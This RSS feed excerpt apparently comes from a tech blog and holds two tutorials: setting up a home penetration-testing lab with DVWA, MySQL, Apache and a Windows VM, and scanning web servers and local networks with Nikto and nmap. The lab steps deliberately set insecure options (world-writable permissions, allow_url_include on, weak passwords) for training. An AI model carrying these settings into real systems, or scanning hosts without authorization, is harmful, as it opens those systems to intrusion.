<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5372 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned-300x98.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned-768x252.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/The-DVWA-file-has-successfully-cloned-696x228.png 696w" alt="The DVWA file has successfully cloned" width="975" height="320">Type ‘ls’ to see DVWA directoy</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5373 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy.png" sizes="auto, (max-width: 972px) 100vw, 972px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy.png 972w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy-300x100.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy-768x255.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-‘ls’-to-see-DVWA-directoy-696x231.png 696w" alt="Type ‘ls’ to see DVWA directoy" width="972" height="323"></p>
<p>Give this directory all the permissions by typing “chmod –R 777 DVWA/”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5374 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”-300x106.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”-768x270.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-this-directory-all-the-permissions-by-typing-“chmod-–R-777-DVWA”-696x245.png 696w" alt="Give this directory all the permissions by typing “chmod –R 777 DVWA”" width="975" height="343">Switch the config DVWA/config directory to set the configuration</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5375 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration-300x115.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration-768x294.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-the-config-DVWA-config-directoy-to-set-the-configuration-696x266.png 696w" alt="Switch the config DVWA config directoy to set the configuration" width="975" height="373">Type ls to see the config file</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5376 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-300x130.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-768x333.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-696x302.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-config-file-968x420.png 968w" alt="Type ls to see the config file" width="975" height="423">This is the default configuration file. Make a copy of this file to keep the default configuration file that will help you to restore if you have made some mistakes while configuring this file.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-5377 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-300x138.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-768x353.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-696x320.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/default-configuration-file-914x420.png 914w" alt="default configuration file" width="975" height="448"></p>
<p>Now go to nano editor to edit the configuration</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5378 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-300x140.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-768x359.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-696x326.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Now-go-to-nano-editor-to-edit-the-configuration-898x420.png 898w" alt="Now go to nano editor to edit the configuration" width="975" height="456"></p>
<p>In the editor set the username and password of your choice, save it and exit the editor</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5379 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor.png" sizes="auto, (max-width: 700px) 100vw, 700px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor.png 700w, https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor-300x102.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/In-the-editor-set-the-username-and-password-of-your-choice-save-it-and-exit-the-editor-696x238.png 696w" alt="In the editor set the username and password of your choice, save it and exit the editor" width="700" height="238"></p>
<p><strong>STAGE 02: Configure the MYSQL Database</strong></p>
<p>Start the service</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5380 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Start-the-service.png" sizes="auto, (max-width: 464px) 100vw, 464px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Start-the-service.png 464w, https://www.ehacking.net/wp-content/uploads/2020/02/Start-the-service-300x59.png 300w" alt="" width="464" height="91">Login to mysql as root</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5382 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-300x121.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-768x310.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-696x281.png 696w" alt="" width="975" height="394"></p>
<p>&nbsp;</p>
<p>Create a new user in a database as:</p>
<ul>
<li>Create user ‘user’@’127.0.0.1’ identified by ‘321;</li>
</ul>
<p>The username and password should be the same as you have entered in the configuration file of DVWA</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5382 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-300x121.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-768x310.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Create-a-new-user-in-a-database-696x281.png 696w" alt="Create a new user in a database " width="975" height="394">Give user all the privileges over the database:</p>
<ul>
<li>grant all privileges on dvwa.* to ‘user’@127.0.0.1’ identified by ‘321’;</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5383 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database-300x126.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database-768x321.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Give-user-all-the-privileages-over-the-database-696x291.png 696w" alt="Give user all the privileages over the database" width="975" height="408"></p>
<p>Now exit the database</p>
<p>&nbsp;</p>
<p><strong>STAGE03: Configure the Apache Server</strong></p>
<p>First, start the service</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5384 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/First-start-the-service.png" sizes="auto, (max-width: 453px) 100vw, 453px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/First-start-the-service.png 453w, https://www.ehacking.net/wp-content/uploads/2020/02/First-start-the-service-300x54.png 300w" alt="First start the service" width="453" height="81">Switch to the directory /etc/php/7.3/apache2/ where the configuration file is present that we have to configure</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5385 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-to-the-directory.png" sizes="auto, (max-width: 502px) 100vw, 502px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-to-the-directory.png 502w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-to-the-directory-300x97.png 300w" alt="Switch to the directory" width="502" height="163"></p>
<p>Type ls to see the file i.e. php.ini</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5386 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-file-i.e.-php.ini_.png" sizes="auto, (max-width: 450px) 100vw, 450px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-file-i.e.-php.ini_.png 450w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-file-i.e.-php.ini_-300x69.png 300w" alt="" width="450" height="103"></p>
<p>Use the editor to set the configuration in the php.ini file. I am using gedit editor</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5387 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Use-editor-to-set-the-configuration-in-the-php.ini-file.-I-am-using-gedit-editor.png" sizes="auto, (max-width: 616px) 100vw, 616px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Use-editor-to-set-the-configuration-in-the-php.ini-file.-I-am-using-gedit-editor.png 616w, https://www.ehacking.net/wp-content/uploads/2020/02/Use-editor-to-set-the-configuration-in-the-php.ini-file.-I-am-using-gedit-editor-300x119.png 300w" alt="" width="616" height="245">Set the two highlighted parameter on i.e. allow_url_fopen = On and allow_url_include = On</p>
<p>Save the file, exit the editor and then start the apache service</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5388 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service-300x118.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service-768x301.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service-696x273.png 696w" alt="Save the file, exit the editor and then start the apache service " width="975" height="382"></p>
<p>Now open the browser and access the web application by typing 127.0.0.1/DVWA/ (because we are running this application on a local server)</p>
<p>When accessing the application for the first time you will be redirected to this setup page where it is showing the configuration of web application</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5389 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application.png" sizes="auto, (max-width: 902px) 100vw, 902px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application.png 902w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-300x213.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-768x544.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-696x493.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-593x420.png 593w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-100x70.png 100w" alt="configuration of web application " width="902" height="639">Scroll down and select “Create/Reset Database” to create a database</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5390 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-300x133.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-768x341.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-696x309.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-946x420.png 946w" alt="Scroll down and select “Create Reset Database” to create a database" width="975" height="433">Now finally you will see a login page of DVWA that requires credentials to enter. Default username is “admin” and password is “password”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5391 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Default-username.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Default-username.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-300x210.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-768x537.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-696x487.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-600x420.png 600w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-100x70.png 100w" alt="" width="975" height="682"></p>
<p>After logging in you will see a home page of DVWA that is showing some instructions and warnings. In the left-most corner, there are different vulnerabilities showing that can be exploited.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5392 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-300x213.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-768x544.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-696x493.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-593x420.png 593w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-100x70.png 100w" alt="instructions and warnings" width="975" height="691"></p>
<h2><strong>Windows</strong></h2>
<p>The third target machine is set to be Windows 10 as we will create an environment that will target Linux as well as Microsoft operating system.</p>
<p>Creating Windows VM in VirtualBox is easy because we don’t need to have a product key and can download the ISO file from Microsoft using the&nbsp;<strong>Windows Media creation tool. </strong></p>
<p><strong>Go to the </strong><strong>link <a href="https://www.microsoft.com/en-us/software-download/windows10">https://www.microsoft.com/en-us/software-download/windows10</a> </strong>and select ‘Download tool now’ option</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5393 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-300x135.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-768x347.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-696x314.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-931x420.png 931w" alt="Download tool now" width="975" height="440"></p>
<p>Download the ISO file from here and then create a VM on VirtualBox:</p>
<ol>
<li>Set name, destination, type, and version</li>
<li>Set the memory size</li>
<li>Create the virtual hard drive</li>
<li>Set hard disk file type as VDI</li>
<li>Set storage on a physical device as dynamically allocated</li>
<li>Select the size of virtual hard disk</li>
<li>From settings go to Storage tab and select Controller: IDE, select Empty and from the rightmost corner select the tiny CD icon from where you can browse the ISO file that you have downloaded on your PC. Select the image file</li>
<li>Start the VM and configure</li>
</ol>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5394 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-300x224.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-768x573.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-696x520.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-563x420.png 563w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-80x60.png 80w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-265x198.png 265w" alt="Download the ISO file from here and then create a VM on VirtualBox" width="975" height="728"></p>
<p>So we have created all the VMs and set up the penetration testing environment successfully!</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5395 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully.png" sizes="auto, (max-width: 833px) 100vw, 833px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully.png 833w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-300x152.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-768x389.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-696x353.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-829x420.png 829w" alt="" width="833" height="422"></p>
<p>Use Kali Linux to scan the target and exploit many vulnerabilities present in DVWA, MetaSploitable, and Windows machines, generate some attacks for example: Brute Force, SQL Injection, CSRF, and many more to let you start your Capture the Flag journey.</p>
</div>
<p>The post <a href="http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/">How To Create A Virtual Penetration Testing Lab At Home</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to Use Nikto for Scanning Vulnerabilities of Any Website in Kali Linux</title>
		<link>http://kostacipo.stream/how-to-use-nikto-for-scanning-vulnerabilities-of-any-website-in-kali-linux/</link>
					<comments>http://kostacipo.stream/how-to-use-nikto-for-scanning-vulnerabilities-of-any-website-in-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 21 Feb 2020 13:27:17 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[kali linux]]></category>
		<category><![CDATA[nikto]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1759</guid>

					<description><![CDATA[<p>&#160; When a penetration tester or a security analyst starts to perform website testing, the first step is to conduct reconnaissance where he would get information related to target and from that, he can identify the attack surface. The attack surface is nothing but a total sum of vulnerabilities that can be exploited to carry [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-use-nikto-for-scanning-vulnerabilities-of-any-website-in-kali-linux/">How to Use Nikto for Scanning Vulnerabilities of Any Website in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<div class="tdb-block-inner td-fix-index">
<p>When a penetration tester or a security analyst starts to perform website testing, the first step is to conduct reconnaissance where he would get information related to target and from that, he can identify the attack surface.</p>
<p>The attack surface is nothing but a total sum of vulnerabilities that can be exploited to carry out a&nbsp;security&nbsp;attack. After the attack surface is identified by the analyst, he would use some useful web scanning tools to further identify those vulnerabilities, which might become the primary attack vectors.</p>
<p>So far, Nikto is one of the most commonly used website vulnerability scanners in the industry. It is an open source web server scanner that renders a bunch of vulnerabilities found on a website that could be exploited. Hence playing a primary role to perform website assessment and detects possible vulnerabilities on a site to keep it safe from an attacker.</p>
<p>Let’s just understand how this works. Assume that you have a URL of a target, by using Nikto you need to provide it with one of the three different types of information i.e. an IP Address for a local service, a web domain or an SSL/HTTPS enabled website. These are the three main target information used by Nikto to dig around and hunt the vulnerabilities.</p>
<p>Although we cannot deny the effectiveness of this tool, however one of the main disadvantages of the said tool is, it is not stealthy. While perform scanning on any website that has security controls enabled like Intrusion Detection System or Intrusion Prevention System, they would get notified that they are being scanned.</p>
<h1><strong>Installing the tool Nikto</strong></h1>
<p>You can install Nikto by apt-get install nikto, but in Kali Linux it is pre-installed located in the “Vulnerability Analysis” category.</p>
<h2><strong>Testing</strong></h2>
<p>Type nikto -Help to see all the options that we can perform using this tool.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5139 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture1.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture1.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture1-300x213.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture1-768x546.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture1-696x495.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture1-591x420.png 591w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture1-100x70.png 100w" alt="Nikto" width="975" height="693"></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5140 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture2.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture2.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture2-300x203.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture2-768x521.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture2-696x472.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture2-620x420.png 620w" alt="Nikto" width="975" height="661"><img loading="lazy" decoding="async" class="aligncenter wp-image-5141 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture3.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture3.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture3-300x117.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture3-768x299.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture3-696x271.png 696w" alt="Nikto 3" width="975" height="380"><br />From above we can see it has many options based on performing different tasks. We are going to use a standard syntax i.e. substituting the target’s IP with -h flag and specifying -ssl to force ssl mode on port:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5142 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture4.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture4.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture4-300x141.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture4-768x361.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture4-696x327.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture4-894x420.png 894w" alt="Nikto 4" width="975" height="458"><br />This showing the quick scan of the targeted website.</p>
<p>Now try Nikto on a local network for finding embedded servers for example a login page for a router or an HTTP service on another machine that’s just a server with no website.</p>
<p>First find our IP address from ifconfig.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5143 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture5.png" sizes="auto, (max-width: 948px) 100vw, 948px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture5.png 948w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture5-300x152.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture5-768x390.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture5-696x353.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture5-828x420.png 828w" alt="Nikto 5" width="948" height="481"></p>
<p>After getting the IP run ipcalc to get the range. If it is not installed in your machine first install it by: # apt-get install ipcalc then run # ipcalc 192.168.0.109</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5144 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture6.png" sizes="auto, (max-width: 889px) 100vw, 889px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture6.png 889w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture6-300x93.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture6-768x239.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture6-696x217.png 696w" alt="Nikto 6" width="889" height="277"></p>
<p>We got the range, now we are interested to run Nmap so that we can find services running in that network range.</p>
<p>Let’s get started with port 80 and scan our network range with it, also specify the flag -oG (grepable output) to take out all those hosts that are up and running. Save the output in a file named ‘ehacking.txt’. You can name it whatever you want.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5146 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture9.png" sizes="auto, (max-width: 939px) 100vw, 939px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture9.png 939w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture9-284x300.png 284w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture9-768x811.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture9-696x735.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture9-398x420.png 398w" alt="Nikto 7" width="939" height="991"></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5145 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture10.png" sizes="auto, (max-width: 823px) 100vw, 823px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture10.png 823w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture10-300x175.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture10-768x448.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture10-696x406.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture10-720x420.png 720w" alt="Nikto 8" width="823" height="480"><br />Use cat command to read the output from our saved file</p>
<p>Use cat with ‘awk’, a linux tool that will scan the patterns where ‘Up’ means the port is open and the host is up whereas ‘print 2$’ would direct to print out the second word for each in that line, i.e., IP address. Save that data to a new file named ‘targetIP.txt’ as Nikto can easily interpret files like this.</p>
